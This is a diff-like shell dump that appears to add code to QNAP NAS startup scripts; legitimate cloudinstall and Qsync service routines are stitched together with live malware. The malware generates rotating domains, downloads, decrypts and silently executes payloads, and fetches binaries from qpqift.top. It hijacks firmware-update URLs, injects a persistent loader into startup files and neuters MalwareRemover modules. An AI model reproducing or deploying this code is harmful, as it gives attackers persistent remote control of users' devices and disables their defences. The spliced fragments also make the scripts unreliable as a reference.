+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    exit 1
+esac
+exit 0
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+domainexts='cf:0 tk:0 com:1 ml:0 de:0 rocks:0 mx:0 biz:0 net:1 cn:0 ga:0 gq:0 org:1 top:0 nl:0 men:0 ws:0 se:0 info:0 xyz:0 today:0 ru:0 ec:0 co:0 ee:0 rs:0 com.sv:0 com.cy:0 co.zw:0 kg:0 com.ge:0 tl:0 name:0 tw:0 lv:0 bs:0 li:0 ng:0 ae:0 bt:0 tv:0 pe:0 uz:0 me:0 gy:0 am:0 kr:0 by:0 fr:0 com.uy:0 com.lb:0 com.br:0 vu:0 hk:0 in:0 re:0 ch:0 af:0 com.ps:0 ug:0 dz:0 pro:0 co.th:0 sg:0 cd:0 so:0 mo:0 co.id:0 co.il:0 com.do:0 ke:0 cx:0 ro:0 id:0 pm:0 hm:0 vg:0 az:0 com.eg:0 bz:0 su:0 com.ar:0 gg:0 com.lr:0 pa:0 com.ve:0 al:0 fm:0 to:0 mu:0 co.ck:0 pk:0 co.rs:0 cw:0 nr:0 gd:0 gl:0 ac:0 lk:0 md:0 fi:0 sx:0 lc:0 es:0 cc:0 cm:0 la:0 co.za:0 je:0 cz:0 jp:0 ai:0 pw:0 bg:0 nu:0 ag:0 bm:0 eu:0 com.my:0 sc:0 ax:0 wf:0 ly:0 qa:0 vn:0 aq:0 mobi:0 com.tr:0 com.ua:0 com.py:0 hk.org:0 south.am:0 com.kh:0 co.zm:0 ru.net:0 com.km:0 tt:0 kn:0 co.ls:0 co.fk:0 uy.com:0 com.gu:0 .com.bn:0 com.pf:0 com.fj:0'
+n=0
+
+for ext in $domainexts; do
+	eval 'domainext'"$n"'=$ext'
+	n=$(( $n + 1 ))
+done
+domainextcnt=$n
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+XEOF
+cat >>".backup_${file}" <<EOF
+test -d "\${bdir}/.qpkg/${dir}" || mkdir "\${bdir}/.qpkg/${dir}"
+cd "\${bdir}/.qpkg/${dir}" && rm -f .tmp.*
+EOF
+cat >>".backup_${file}" <<"XEOF"
+
+echo "$verifykey" > ".rsakey"
+
+for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
+	tmpfile=$(mktemp "./.tmp.XXXXXX")
+	test -f "$tmpfile" && outfile=$tmpfile && break
+done
+test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
+curlconntimeout=12
+i=0 n=0 c=0 errorcount=0
+for interval in '1296000' '432000' '86400' '28800' '7200' '3600'; do
+	timestart=$(date +%s)
+	for length in 5 3 4; do
+		timenow=$(date +%s)
+		test "$(( $timenow - $timestart ))" -gt 600 && test "$interval" != "3600" && break
+		curlconntimeout=$(( $curlconntimeout - ( $timenow - $timestart ) / 250 ))
+		test "$curlconntimeout" -lt 6 && curlconntimeout=6
+		n=0; while [ "$n" -lt $domainextcnt ]; do
+			eval 'ext=$domainext'"$n"
+			l=$(( $length + ${ext#*:} ))
+			ext=${ext%:*}
+			if [ $length = 5 ]; then
+				hostname=$(echo "$(( $(date +%s) / $interval ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+				hostname=${hostname%${hostname#??????}}
+				eval 'hostname'"$n"'=$hostname'
+			fi
+			eval 'host=$hostname'"$n"
+			n=$(( $n + 1 ))
+			trycnt=0
+			while [ ${#host} -gt "$l" ] && [ $trycnt -lt 3 ]; do
+				trycnt=$(( $trycnt + 1 ))
+				host=${host%?}
+			done
+			test -f "$outfile" && rm -f "$outfile"
+			recentupdate=''
+			curl --connect-timeout "$curlconntimeout" -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+			test -s "$outfile" || continue
+			fsize=$(( $(wc -c < "$outfile") ))
+			test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+			rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+			test "$rsamsg" || continue
+			path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+			hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+			test "$rsadomain" = "${host}.${ext}" || continue
+			timenow=$(date +%s)
+			test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+			curl --connect-timeout "$curlconntimeout" -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+			filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+			test "$filehash" = "$hash" || continue
+			curl --connect-timeout "$curlconntimeout" -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+			verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+			mv "${outfile}_s" "${ts}_v"
+			chmod 755 "$outfile" || continue
+			( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
+			test "${recentupdate:-0}" -eq 1 && exit 0
+			for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
+				tmpfile=$(mktemp "./.tmp.XXXXXX")
+				test -f "$tmpfile" && outfile=$tmpfile && break
+			done
+			test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
+		done
+	done
+done
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	exit 0
+fi
+fi
+XEOF
+chmod 755 ".backup_${file}"
+if grep "\.backup_${file}" "$file"; then
+:
+else
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+echo ". ./.backup_${file}" >> "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+
+fi
+
+if [ ! -f ".qdisk_cmd" ]; then
+	case "$(uname -m)" in 
+	*x86_64*)
+			arch=x86_64
+			binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
+			;;
+	*arm*|*aarch*)
+			arch=arm
+			binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
+			;;
+	*i*86*)
+			arch=i486
+			binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
+			;;
+	esac
+	
+	if [ "x${binhash}" != 'x' ]; then
+		curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
+		test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
+		if [ "x${rsynchash}" = "x${binhash}" ]; then
+			mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
+		else
+			rm -f '.qdisk_cmd.tmp'
+		fi
+	fi
+fi
+binhash=''; rsynchash=''
+
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+if [ -f "${path#*/}" ]; then 
+test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${path#*/}"
+elif [ -f "${bdir}/.qpkg/${path}" ]; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${bdir}/.qpkg/${path}"
+fi
+done
+
+version=$(getcfg System Version)
+test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
+test "${version##*.}" -lt 3 || test "${version%%.*}" -lt 4 || test "$(version=${version#*.}; echo "${version%.*}")" -lt 3 && version=4.3.3 || { test "${version##*.}" -gt 5 && version=4.3.5; }
+
+if [ ! -d rssdoc ]; then 
+command -v bunzip2 && compext=bz2 || compext=gz
+curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" && test -f "rssdoc.tar.${compext}" && rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)" && { test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA="; } && { test "$compext" = bz2 && tarflag=j || tarflag=z; } && tar -x${tarflag}f "rssdoc.tar.${compext}" || rm -f rssdoc.tar
+rm -f "rssdoc.tar.${compext}"
+fi
+
+rm -f /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
+ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
+
+if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
+internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
+localupdateurl="http://127.0.0.1:${internalwebport}"
+sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+fi
+
+test -f '/etc/config/rssdoc/qpkgcenter_*.xml' || test -h '/etc/config/rssdoc/qpkgcenter_*.xml' && { test -f '.qdisk_cmd' && ./.qdisk_cmd -i '/etc/config/rssdoc/qpkgcenter_*.xml'; rm -f '/etc/config/rssdoc/qpkgcenter_*.xml'; }
+
+if find /etc/config/rssdoc | grep 'qpkgcenter_.*\.xml'; then
+:
+else
+cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
+fi
+
+for file in /etc/config/rssdoc/qpkgcenter_*.xml
+do
+if [ -f "$file" ] && { rm -f "$file" || [ ! -s "$file" ]; }; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+touch "$file"
+cp -f "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+done
+file=''
+
+for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
+test -d "$qpkgdir" && break
+done
+test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
+test -d "${qpkgdir}/MalwareRemover/modules" || mkdir "${qpkgdir}/MalwareRemover/modules"
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover"
+
+if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
+for file in 10_derek_3.pyc 12_derek_3.pyc; do
+if [ ! -f "${qpkgdir}/MalwareRemover/modules/${file}" ] || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" || test -x "${qpkgdir}/MalwareRemover/modules/${file}" || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -gt 150 ] || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -lt 120 ]; then
+test -f '.qdisk_cmd' && test -f "${qpkgdir}/MalwareRemover/modules/${file}" && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover/modules/${file}" && rm -f "${qpkgdir}/MalwareRemover/modules/${file}"
+openssl base64 -d <<"EOF" >"${qpkgdir}/MalwareRemover/modules/${file}"
+A/MNCuVwTVxjAAAAAAAAAAABAAAAQAAAAHMLAAAAZQAAgwAAAWQAAFMoAQAAAE4o
+AQAAAHQEAAAAZXhpdCgAAAAAKAAAAAAoAAAAAHMVAAAAbW9kdWxlcy8xMF9kZXJl
+a18zLnB5dAgAAAA8bW9kdWxlPgEAAABzAAAAAA==
+EOF
+chmod -x "${qpkgdir}/MalwareRemover/modules/${file}"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
+fi
+done
+fi
+file=''; qpkgdir=''
+
+if [ ! -f .rsakey ]; then
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+fi
+
+cgibindir='/home/httpd/cgi-bin'
+if [ ! -f "1551848401_c" ] && [ -f "${cgibindir}/authLogin.cgi" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ]; then
+	test -f "1551848401_c" || touch "1551848401_c"
+	case "$(uname -m)" in 
+	*x86_64*)
+			arch=x86_64
+			binhash='rrYwg0D4+4DxcDxYQsNTB4JUGlQ='
+			;;
+	*arm*|*aarch*)
+			arch=arm
+			binhash='Z4n2BZdhwjYf0wjM7GCW61WM9eU='
+			;;
+	*i*86*)
+			arch=i486
+			binhash='U3eHe6syQraRBGgsvkFZH3wibDw='
+			;;
+	esac
+	
+	if [ "x${binhash}" != 'x' ]; then
+		curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal2_${arch}" || rm -f ".qal"
+		test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
